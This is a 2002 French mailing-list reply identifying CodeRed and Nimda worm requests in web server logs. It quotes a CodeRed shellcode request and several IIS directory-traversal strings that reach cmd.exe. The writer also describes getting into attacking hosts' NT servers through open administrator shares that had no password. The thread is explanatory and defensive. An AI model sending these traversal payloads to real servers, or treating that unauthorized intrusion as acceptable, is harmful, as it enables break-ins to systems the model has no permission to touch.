Salut c'est un attaque de CodeRed mais c'est contre les serveur IIS de chez Microsoft que ça peut éventuellement fonctionner j'ai est plein les log depuis aout 2001 et on peut pas faire grand chose. Du même genre y a aussi : GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir ou encore GET /c/winnt/system32/cmd.exe?/c+dir ou encore GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" et encore GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" et aussi GET/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
enfin bon voilà un échantillon de truc que tu peut avoir dans tes log et qui sont des attaques des vers CodeRed 1 et 2,Nimda et autre contre des serveur IIS Microsoft. Pour ma part je suis en adsl chez wanadoo et je reçois environ une attaque de ce genre toute les 2 secondes pendant 20 secondes et ça recommence environ une heure plus tard toutes les 2 secondes pendant 20 seconde etc ... puis ça change d'ip et ç'est reparti. Plusieurs fois j'ai contacté wanadoo sans réponses Puis j'ai scanné les ip qui "m'attaquais" souvant j'ai pu entrer sur des serveur NT ou tous etait grand ouvert il suffisais de faire un mount -t smbfs \\nomduserveur\C$ avec administrateur comme nom d'utilsateur et pas de mot de passe !!!! dans ces cas je laissais un message pour les prévenir et puis a force ça ma saoulé et maintenant le regarde juste mes log grossir ;o(( ......... voilà a+ Le mer 23/10/2002 à 22:49, Remi POISSONNIER a écrit : > Bonjour, > Mon serveur Apache reçoit des requêtes du type : > 168.191.50.39 - - [15/Oct/2002:11:10:20 +0200] "GET /default.ida?NN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNN%u9090%u6858%ucbd3%u7801 > %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3 > %u7801%u9090%u9090%u8190%u00c3%u0003%u8b00 > %u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 346 "-" "-" > > Il s'agit d'une tentavide d'attaque, qui en sait plus ... > (Il semblerait (d'après 'nmap' que l'origine vienne de poste Linux, en ADSL). > D'avance merci > --------------------------------------------------- > Rémi POISSONNIER > 89 Laroche St Cydroine > mailto : [EMAIL PROTECTED] > Des applications Linux pour établissement scolaire : > Serveur d'intranet, Serveur Novell 3.11, Serveur NT 3.5/4.0 (en travaux ....) > : > http://www.chez.com/imer/index.htm > > Echelon is watching you ;-( > Hackers, Encryption, NSA > > ---- > > Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? > Rendez-vous sur "http://www.mandrakestore.com"
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com"